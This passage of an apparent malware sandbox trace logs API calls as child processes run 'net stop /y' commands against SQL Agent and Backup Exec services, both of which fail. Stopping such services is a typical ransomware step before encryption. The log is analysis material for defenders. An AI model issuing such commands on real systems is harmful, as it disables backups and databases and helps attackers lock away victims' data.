returned="C:\\Windows\\system32\\net1 stop SQLAgent$PRACTTICEMGT /y" [0206.067] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x20f788, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0206.067] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x7e) returned 0x563c20 [0206.068] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0206.068] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x20f98c | out: Buffer=0x20f98c*=0x561c80) returned 0x0 [0206.068] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x20f98c | out: Buffer=0x20f98c*=0x561c98) returned 0x0 [0206.068] _fileno (_File=0x74eb2900) returned -2 [0206.068] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0206.068] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0206.068] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0206.068] _wcsicmp (_String1="config", _String2="stop") returned -16 [0206.068] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0206.068] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0206.068] _wcsicmp (_String1="file", _String2="stop") returned -13 [0206.068] _wcsicmp (_String1="files", _String2="stop") returned -13 [0206.068] _wcsicmp (_String1="group", _String2="stop") returned -12 [0206.068] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0206.068] _wcsicmp (_String1="help", _String2="stop") returned -11 [0206.068] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0206.068] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0206.068] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0206.068] _wcsicmp (_String1="session", _String2="stop") returned -15 [0206.068] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0206.068] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0206.068] _wcsicmp (_String1="share", _String2="stop") returned -12 [0206.068] _wcsicmp (_String1="start", _String2="stop") returned -14 [0206.068] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0206.068] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0206.069] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0206.069] _wcsicmp (_String1="accounts", _String2="SQLAgent$PRACTTICEMGT") returned -18 [0206.069] _wcsicmp (_String1="computer", _String2="SQLAgent$PRACTTICEMGT") returned -16 [0206.069] _wcsicmp (_String1="config", _String2="SQLAgent$PRACTTICEMGT") returned -16 [0206.069] _wcsicmp (_String1="continue", _String2="SQLAgent$PRACTTICEMGT") returned -16 [0206.069] _wcsicmp (_String1="cont", _String2="SQLAgent$PRACTTICEMGT") returned -16 [0206.069] _wcsicmp (_String1="file", _String2="SQLAgent$PRACTTICEMGT") returned -13 [0206.069] _wcsicmp (_String1="files", _String2="SQLAgent$PRACTTICEMGT") returned -13 [0206.069] _wcsicmp (_String1="group", _String2="SQLAgent$PRACTTICEMGT") returned -12 [0206.069] _wcsicmp (_String1="groups", _String2="SQLAgent$PRACTTICEMGT") returned -12 [0206.069] _wcsicmp (_String1="help", _String2="SQLAgent$PRACTTICEMGT") returned -11 [0206.069] _wcsicmp (_String1="helpmsg", _String2="SQLAgent$PRACTTICEMGT") returned -11 [0206.069] _wcsicmp (_String1="localgroup", _String2="SQLAgent$PRACTTICEMGT") returned -7 [0206.069] _wcsicmp (_String1="pause", _String2="SQLAgent$PRACTTICEMGT") returned -3 [0206.069] _wcsicmp (_String1="session", _String2="SQLAgent$PRACTTICEMGT") returned -12 [0206.069] _wcsicmp (_String1="sessions", _String2="SQLAgent$PRACTTICEMGT") returned -12 [0206.069] _wcsicmp (_String1="sess", _String2="SQLAgent$PRACTTICEMGT") returned -12 [0206.069] _wcsicmp (_String1="share", _String2="SQLAgent$PRACTTICEMGT") returned -9 [0206.069] _wcsicmp (_String1="start", _String2="SQLAgent$PRACTTICEMGT") returned 3 [0206.069] _wcsicmp (_String1="stats", _String2="SQLAgent$PRACTTICEMGT") returned 3 [0206.069] _wcsicmp (_String1="statistics", _String2="SQLAgent$PRACTTICEMGT") returned 3 [0206.069] _wcsicmp (_String1="stop", _String2="SQLAgent$PRACTTICEMGT") returned 3 [0206.069] _wcsicmp (_String1="time", _String2="SQLAgent$PRACTTICEMGT") returned 1 [0206.069] _wcsicmp (_String1="user", _String2="SQLAgent$PRACTTICEMGT") returned 2 [0206.069] _wcsicmp (_String1="users", _String2="SQLAgent$PRACTTICEMGT") returned 2 [0206.069] _wcsicmp (_String1="msg", _String2="SQLAgent$PRACTTICEMGT") returned -6 [0206.069] _wcsicmp (_String1="messenger", _String2="SQLAgent$PRACTTICEMGT") returned -6 [0206.069] _wcsicmp (_String1="receiver", _String2="SQLAgent$PRACTTICEMGT") returned -1 [0206.069] _wcsicmp (_String1="rcv", _String2="SQLAgent$PRACTTICEMGT") returned -1 [0206.069] _wcsicmp (_String1="netpopup", _String2="SQLAgent$PRACTTICEMGT") returned -5 [0206.069] _wcsicmp (_String1="redirector", _String2="SQLAgent$PRACTTICEMGT") returned -1 [0206.069] _wcsicmp (_String1="redir", _String2="SQLAgent$PRACTTICEMGT") returned -1 [0206.069] _wcsicmp (_String1="rdr", _String2="SQLAgent$PRACTTICEMGT") returned -1 [0206.069] _wcsicmp (_String1="workstation", _String2="SQLAgent$PRACTTICEMGT") returned 4 [0206.069] _wcsicmp (_String1="work", _String2="SQLAgent$PRACTTICEMGT") returned 4 [0206.069] _wcsicmp (_String1="wksta", _String2="SQLAgent$PRACTTICEMGT") returned 4 [0206.069] _wcsicmp (_String1="prdr", _String2="SQLAgent$PRACTTICEMGT") returned -3 [0206.069] _wcsicmp (_String1="devrdr", _String2="SQLAgent$PRACTTICEMGT") returned -15 [0206.070] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAgent$PRACTTICEMGT") returned -7 [0206.070] _wcsicmp (_String1="server", _String2="SQLAgent$PRACTTICEMGT") returned -12 [0206.070] _wcsicmp (_String1="svr", _String2="SQLAgent$PRACTTICEMGT") returned 5 [0206.070] _wcsicmp (_String1="srv", _String2="SQLAgent$PRACTTICEMGT") returned 1 [0206.070] _wcsicmp (_String1="lanmanserver", _String2="SQLAgent$PRACTTICEMGT") returned -7 [0206.070] _wcsicmp (_String1="alerter", _String2="SQLAgent$PRACTTICEMGT") returned -18 [0206.070] _wcsicmp (_String1="netlogon", _String2="SQLAgent$PRACTTICEMGT") returned -5 [0206.070] _wcsupr (in: _String="SQLAgent$PRACTTICEMGT" | out: _String="SQLAGENT$PRACTTICEMGT") returned="SQLAGENT$PRACTTICEMGT" [0206.070] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x5654f0 [0206.072] GetServiceKeyNameW (in: hSCManager=0x5654f0, lpDisplayName="SQLAGENT$PRACTTICEMGT", lpServiceName=0x79aaf0, lpcchBuffer=0x20f928 | out: lpServiceName="", lpcchBuffer=0x20f928) returned 0 [0206.073] _wcsicmp (_String1="msg", _String2="SQLAGENT$PRACTTICEMGT") returned -6 [0206.073] _wcsicmp (_String1="messenger", _String2="SQLAGENT$PRACTTICEMGT") returned -6 [0206.073] _wcsicmp (_String1="receiver", _String2="SQLAGENT$PRACTTICEMGT") returned -1 [0206.073] _wcsicmp (_String1="rcv", _String2="SQLAGENT$PRACTTICEMGT") returned -1 [0206.073] _wcsicmp (_String1="redirector", _String2="SQLAGENT$PRACTTICEMGT") returned -1 [0206.073] _wcsicmp (_String1="redir", _String2="SQLAGENT$PRACTTICEMGT") returned -1 [0206.073] _wcsicmp (_String1="rdr", _String2="SQLAGENT$PRACTTICEMGT") returned -1 [0206.073] _wcsicmp (_String1="workstation", _String2="SQLAGENT$PRACTTICEMGT") returned 4 [0206.073] _wcsicmp (_String1="work", _String2="SQLAGENT$PRACTTICEMGT") returned 4 [0206.073] _wcsicmp (_String1="wksta", _String2="SQLAGENT$PRACTTICEMGT") returned 4 [0206.073] _wcsicmp (_String1="prdr", _String2="SQLAGENT$PRACTTICEMGT") returned -3 [0206.073] _wcsicmp (_String1="devrdr", _String2="SQLAGENT$PRACTTICEMGT") returned -15 [0206.073] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAGENT$PRACTTICEMGT") returned -7 [0206.073] _wcsicmp (_String1="server", _String2="SQLAGENT$PRACTTICEMGT") returned -12 [0206.073] _wcsicmp (_String1="svr", _String2="SQLAGENT$PRACTTICEMGT") returned 5 [0206.073] _wcsicmp (_String1="srv", _String2="SQLAGENT$PRACTTICEMGT") returned 1 [0206.073] _wcsicmp (_String1="lanmanserver", _String2="SQLAGENT$PRACTTICEMGT") returned -7 [0206.073] _wcsicmp (_String1="alerter", _String2="SQLAGENT$PRACTTICEMGT") returned -18 [0206.073] _wcsicmp (_String1="netlogon", _String2="SQLAGENT$PRACTTICEMGT") returned -5 [0206.073] NetServiceControl (in: servername=0x0, service="SQLAGENT$PRACTTICEMGT", opcode=0x0, arg=0x0, bufptr=0x20f924 | out: bufptr=0x20f924) returned 0x889 [0206.074] wcscpy_s (in: _Destination=0x79a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0206.074] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0206.075] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x79b338, nSize=0x800, Arguments=0x799dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0206.076] GetFileType (hFile=0x26c) returned 0x3 [0206.076] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x564020 [0206.076] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x564020, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\nU", lpUsedDefaultChar=0x0) returned 30 [0206.076] WriteFile (in: hFile=0x26c, lpBuffer=0x564020, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x20f864, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x20f864, lpOverlapped=0x0) returned 0 [0206.076] LocalFree (hMem=0x564020) returned 0x0 [0206.076] GetFileType (hFile=0x26c) returned 0x3 [0206.076] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5662c8 [0206.076] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5662c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nV", lpUsedDefaultChar=0x0) returned 2 [0206.076] WriteFile (in: hFile=0x26c, lpBuffer=0x5662c8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x20f864, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x20f864, lpOverlapped=0x0) returned 0 [0206.077] LocalFree (hMem=0x5662c8) returned 0x0 [0206.077] _ultow (in: _Dest=0x889, _Radix=2160788 | out: _Dest=0x889) returned="2185" [0206.077] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x79b338, nSize=0x800, Arguments=0x799dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0206.077] GetFileType (hFile=0x26c) returned 0x3 [0206.077] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x5662c8 [0206.077] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x5662c8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0206.077] WriteFile (in: hFile=0x26c, lpBuffer=0x5662c8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x20f870, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x20f870, lpOverlapped=0x0) returned 0 [0206.077] LocalFree (hMem=0x5662c8) returned 0x0 [0206.077] GetFileType (hFile=0x26c) returned 0x3 [0206.077] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5662c8 [0206.077] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5662c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nV", lpUsedDefaultChar=0x0) returned 2 [0206.077] WriteFile (in: hFile=0x26c, lpBuffer=0x5662c8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x20f870, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x20f870, lpOverlapped=0x0) returned 0 [0206.077] LocalFree (hMem=0x5662c8) returned 0x0 [0206.078] NetApiBufferFree (Buffer=0x561c80) returned 0x0 [0206.078] NetApiBufferFree (Buffer=0x561c98) returned 0x0 [0206.078] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$PRACTTICEMGT /y" [0206.078] exit (_Code=2) Process: id = "234" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x6c621000" os_pid = "0x2c8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop BackupExecJobEngine /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 407 os_tid = 0x814 Process: id = "235" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x67e2f000" os_pid = "0x11c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "234" os_parent_pid = "0x2c8" cmd_line = "C:\\Windows\\system32\\net1 stop BackupExecJobEngine /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 408 os_tid = 0x73c [0206.211] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x13ff74 | out: lpSystemTimeAsFileTime=0x13ff74*(dwLowDateTime=0x4419e8e0, dwHighDateTime=0x1d57a87)) [0206.211] GetCurrentProcessId () returned 0x11c [0206.211] GetCurrentThreadId () returned 0x73c [0206.211] GetTickCount () returned 0x116d29b [0206.211] QueryPerformanceCounter (in: lpPerformanceCount=0x13ff6c | out: lpPerformanceCount=0x13ff6c*=32649599998) returned 1 [0206.212] GetModuleHandleA (lpModuleName=0x0) returned 0xae0000 [0206.212] __set_app_type (_Type=0x1) [0206.212] __p__fmode () returned 0x74eb31f4 [0206.212] __p__commode () returned 0x74eb31fc [0206.212] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xaeffe6) returned 0x0 [0206.212] __getmainargs (in: _Argc=0xaf9064, _Argv=0xaf906c, _Env=0xaf9068, _DoWildCard=0, _StartInfo=0xaf9024 | out: _Argc=0xaf9064, _Argv=0xaf906c, _Env=0xaf9068) returned 0 [0206.212] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0206.212] GetConsoleOutputCP () returned 0x1b5 [0206.212] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xaf9080 | out: lpCPInfo=0xaf9080) returned 1 [0206.212] SetThreadUILanguage (LangId=0x0) returned 0x409 [0206.215] sprintf_s (in: _DstBuf=0x13ff2c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0206.216] setlocale (category=0, locale=".437") returned="English_United States.437" [0206.218] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0206.218] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0206.218] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop BackupExecJobEngine /y" [0206.218] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x13fcf8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0206.218] RtlAllocateHeap (HeapHandle=0x300000, Flags=0x0, Size=0x7a) returned 0x313c20 [0206.218] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0206.218] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x13fefc | out: Buffer=0x13fefc*=0x311c80) returned 0x0 [0206.219] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x13fefc | out: Buffer=0x13fefc*=0x311c98) returned 0x0 [0206.219] _fileno (_File=0x74eb2900) returned -2 [0206.219] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0206.219] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0206.219] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0206.219] _wcsicmp (_String1="config", _String2="stop") returned -16 [0206.219] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0206.219] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0206.219] _wcsicmp (_String1="file", _String2="stop") returned -13 [0206.219] _wcsicmp (_String1="files", _String2="stop") returned -13 [0206.219] _wcsicmp (_String1="group", _String2="stop") returned -12 [0206.219] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0206.219] _wcsicmp (_String1="help", _String2="stop") returned -11 [0206.219] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0206.219] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0206.219] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0206.219] _wcsicmp (_String1="session", _String2="stop") returned -15 [0206.219] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0206.219] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0206.219] _wcsicmp (_String1="share", _String2="stop") returned -12 [0206.219] _wcsicmp (_String1="start", _String2="stop") returned -14 [0206.219] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0206.219] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0206.219] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0206.219] _wcsicmp (_String1="accounts", _String2="BackupExecJobEngine") returned -1 [0206.219] _wcsicmp (_String1="computer", _String2="BackupExecJobEngine") returned 1 [0206.219] _wcsicmp (_String1="config", _String2="BackupExecJobEngine") returned 1 [0206.220] _wcsicmp (_String1="continue", _String2="BackupExecJobEngine") returned 1 [0206.220] _wcsicmp (_String1="cont", _String2="BackupExecJobEngine") returned 1 [0206.220] _wcsicmp (_String1="file", _String2="BackupExecJobEngine") returned 4 [0206.220] _wcsicmp (_String1="files", _String2="BackupExecJobEngine") returned 4 [0206.220] _wcsicmp (_String1="group", _String2="BackupExecJobEngine") returned 5 [0206.220] _wcsicmp (_String1="groups", _String2="BackupExecJobEngine") returned 5 [0206.220] _wcsicmp (_String1="help", _String2="BackupExecJobEngine") returned 6 [0206.220] _wcsicmp (_String1="helpmsg", _String2="BackupExecJobEngine") returned 6 [0206.220] _wcsicmp (_String1="localgroup", _String2="BackupExecJobEngine") returned 10 [0206.220] _wcsicmp (_String1="pause", _String2="BackupExecJobEngine") returned 14 [0206.220] _wcsicmp (_String1="session", _String2="BackupExecJobEngine") returned 17 [0206.220] _wcsicmp (_String1="sessions", _String2="BackupExecJobEngine") returned 17 [0206.220] _wcsicmp (_String1="sess", _String2="BackupExecJobEngine") returned 17 [0206.220] _wcsicmp (_String1="share", _String2="BackupExecJobEngine") returned 17 [0206.220] _wcsicmp (_String1="start", _String2="BackupExecJobEngine") returned 17 [0206.220] _wcsicmp (_String1="stats", _String2="BackupExecJobEngine") returned 17 [0206.220] _wcsicmp (_String1="statistics", _String2="BackupExecJobEngine") returned 17 [0206.220] _wcsicmp (_String1="stop", _String2="BackupExecJobEngine") returned 17 [0206.220] _wcsicmp (_String1="time", _String2="BackupExecJobEngine") returned 18 [0206.220] _wcsicmp (_String1="user", _String2="BackupExecJobEngine") returned 19 [0206.220] _wcsicmp (_String1="users", _String2="BackupExecJobEngine") returned 19 [0206.220] _wcsicmp (_String1="msg", _String2="BackupExecJobEngine") returned 11 [0206.220] _wcsicmp (_String1="messenger", _String2="BackupExecJobEngine") returned 11 [0206.220] _wcsicmp (_String1="receiver", _String2="BackupExecJobEngine") returned 16 [0206.220] _wcsicmp (_String1="rcv", _String2="BackupExecJobEngine") returned 16 [0206.220] _wcsicmp (_String1="netpopup", _String2="BackupExecJobEngine") returned 12 [0206.220] _wcsicmp (_String1="redirector", _String2="BackupExecJobEngine") returned 16 [0206.220] _wcsicmp (_String1="redir", _String2="BackupExecJobEngine") returned 16 [0206.220] _wcsicmp (_String1="rdr", _String2="BackupExecJobEngine") returned 16 [0206.220] _wcsicmp (_String1="workstation", _String2="BackupExecJobEngine") returned 21 [0206.220] _wcsicmp (_String1="work", _String2="BackupExecJobEngine") returned 21 [0206.220] _wcsicmp (_String1="wksta", _String2="BackupExecJobEngine") returned 21 [0206.220] _wcsicmp (_String1="prdr", _String2="BackupExecJobEngine") returned 14 [0206.220] _wcsicmp (_String1="devrdr", _String2="BackupExecJobEngine") returned 2 [0206.220] _wcsicmp (_String1="lanmanworkstation", _String2="BackupExecJobEngine") returned 10 [0206.220] _wcsicmp (_String1="server", _String2="BackupExecJobEngine") returned 17 [0206.220] _wcsicmp (_String1="svr", _String2="BackupExecJobEngine") returned 17 [0206.221] _wcsicmp (_String1="srv", _String2="BackupExecJobEngine") returned 17 [0206.221] _wcsicmp (_String1="lanmanserver", _String2="BackupExecJobEngine") returned 10 [0206.221] _wcsicmp (_String1="alerter", _String2="BackupExecJobEngine") returned -1 [0206.221] _wcsicmp (_String1="netlogon", _String2="BackupExecJobEngine") returned 12 [0206.221] _wcsupr (in: _String="BackupExecJobEngine" | out: _String="BACKUPEXECJOBENGINE") returned="BACKUPEXECJOBENGINE" [0206.221] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3154f0 [0206.223] GetServiceKeyNameW (in: hSCManager=0x3154f0, lpDisplayName="BACKUPEXECJOBENGINE", lpServiceName=0xafaaf0, lpcchBuffer=0x13fe98 | out: lpServiceName="", lpcchBuffer=0x13fe98) returned 0 [0206.224] _wcsicmp (_String1="msg", _String2="BACKUPEXECJOBENGINE") returned 11 [0206.224] _wcsicmp (_String1="messenger", _String2="BACKUPEXECJOBENGINE") returned 11 [0206.224] _wcsicmp (_String1="receiver", _String2="BACKUPEXECJOBENGINE") returned 16 [0206.224] _wcsicmp (_String1="rcv", _String2="BACKUPEXECJOBENGINE") returned 16 [0206.224] _wcsicmp (_String1="redirector", _String2="BACKUPEXECJOBENGINE") returned 16 [0206.224] _wcsicmp (_String1="redir", _String2="BACKUPEXECJOBENGINE") returned 16 [0206.224] _wcsicmp (_String1="rdr", _String2="BACKUPEXECJOBENGINE") returned 16 [0206.224] _wcsicmp (_String1="workstation", _String2="BACKUPEXECJOBENGINE") returned 21 [0206.224] _wcsicmp (_String1="work", _String2="BACKUPEXECJOBENGINE") returned 21 [0206.224] _wcsicmp (_String1="wksta", _String2="BACKUPEXECJOBENGINE") returned 21 [0206.224] _wcsicmp (_String1="prdr", _String2="BACKUPEXECJOBENGINE") returned 14 [0206.224] _wcsicmp (_String1="devrdr", _String2="BACKUPEXECJOBENGINE") returned 2 [0206.224] _wcsicmp (_String1="lanmanworkstation", _String2="BACKUPEXECJOBENGINE") returned 10 [0206.224] _wcsicmp (_String1="server", _String2="BACKUPEXECJOBENGINE") returned 17 [0206.224] _wcsicmp (_String1="svr", _String2="BACKUPEXECJOBENGINE") returned 17 [0206.224] _wcsicmp (_String1="srv", _String2="BACKUPEXECJOBENGINE") returned 17 [0206.224] _wcsicmp (_String1="lanmanserver", _String2="BACKUPEXECJOBENGINE") returned 10 [0206.224] _wcsicmp (_String1="alerter", _String2="BACKUPEXECJOBENGINE") returned -1 [0206.224] _wcsicmp (_String1="netlogon", _String2="BACKUPEXECJOBENGINE") returned 12 [0206.224] NetServiceControl (in: servername=0x0, service="BACKUPEXECJOBENGINE", opcode=0x0, arg=0x0, bufptr=0x13fe94 | out: bufptr=0x13fe94) returned 0x889 [0206.225] wcscpy_s (in: _Destination=0xafa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0206.225] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0206.226] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xafb338, nSize=0x800, Arguments=0xaf9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0206.227] GetFileType (hFile=0x26c) returned 0x3 [0206.227] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x314020 [0206.227] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x314020, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n0", lpUsedDefaultChar=0x0) returned 30 [0206.227] WriteFile (in: hFile=0x26c, lpBuffer=0x314020, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x13fdd4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x13fdd4, lpOverlapped=0x0) returned 0 [0206.227] LocalFree (hMem=0x314020) returned 0x0 [0206.227] GetFileType (hFile=0x26c) returned 0x3 [0206.227] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3162c8 [0206.227] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3162c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n1", lpUsedDefaultChar=0x0) returned 2 [0206.227] WriteFile (in: hFile=0x26c, lpBuffer=0x3162c8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x13fdd4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x13fdd4, lpOverlapped=0x0) returned 0 [0206.227] LocalFree (hMem=0x3162c8) returned 0x0 [0206.227] _ultow (in: _Dest=0x889, _Radix=1310212 | out: _Dest=0x889) returned="2185" [0206.227] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xafb338, nSize=0x800, Arguments=0xaf9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0206.228] GetFileType (hFile=0x26c) returned 0x3 [0206.228] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x3162c8 [0206.228] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x3162c8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0206.228] WriteFile (in: hFile=0x26c, lpBuffer=0x3162c8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x13fde0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x13fde0, lpOverlapped=0x0) returned 0 [0206.228] LocalFree (hMem=0x3162c8) returned 0x0 [0206.228] GetFileType (hFile=0x26c) returned 0x3 [0206.228] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3162c8 [0206.228] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3162c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n1", lpUsedDefaultChar=0x0) returned 2 [0206.228] WriteFile (in: hFile=0x26c, lpBuffer=0x3162c8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x13fde0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x13fde0, lpOverlapped=0x0) returned 0 [0206.228] LocalFree (hMem=0x3162c8) returned 0x0 [0206.228] NetApiBufferFree (Buffer=0x311c80) returned 0x0 [0206.229] NetApiBufferFree (Buffer=0x311c98) returned 0x0 [0206.229] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop BackupExecJobEngine /y" [0206.229] exit (_Code=2) 